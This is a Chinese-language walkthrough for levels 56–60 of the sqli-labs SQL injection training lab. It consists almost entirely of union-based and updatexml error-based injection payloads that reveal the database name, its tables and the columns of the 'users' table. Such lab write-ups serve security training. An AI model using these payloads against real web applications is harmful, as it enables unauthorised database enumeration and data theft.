sql-labs56-60通关攻略

第56关

一查询数据库

?id=-1')union select 1,2,database()--+

二.查表

?id=-1')union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

三.查看users表中列名

?id=-1')union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

第57关

一.查看数据库

?id=-1"union select 1,2,database()--+

二.查看表名

?id=-1"union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

三.查看users表中列名

?id=-1"union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

第58关

一.查看数据库

?id=1' and updatexml(1,concat(1,(select database())),1)--+

二.查看表名

?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

三.查看users表中列名

?id=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+

第59关

一.查看数据库

?id=1 and updatexml(1,concat(1,(select database())),1)

二.查看表名

?id=1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)

三.查看users表中列名

?id=1 and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)

第60关

一.查看数据库

?id=1") and updatexml(1,concat(1,(select database())),1)--+

二.查看表名

?id=1") and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

三.查看users表中列名

?id=1")and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+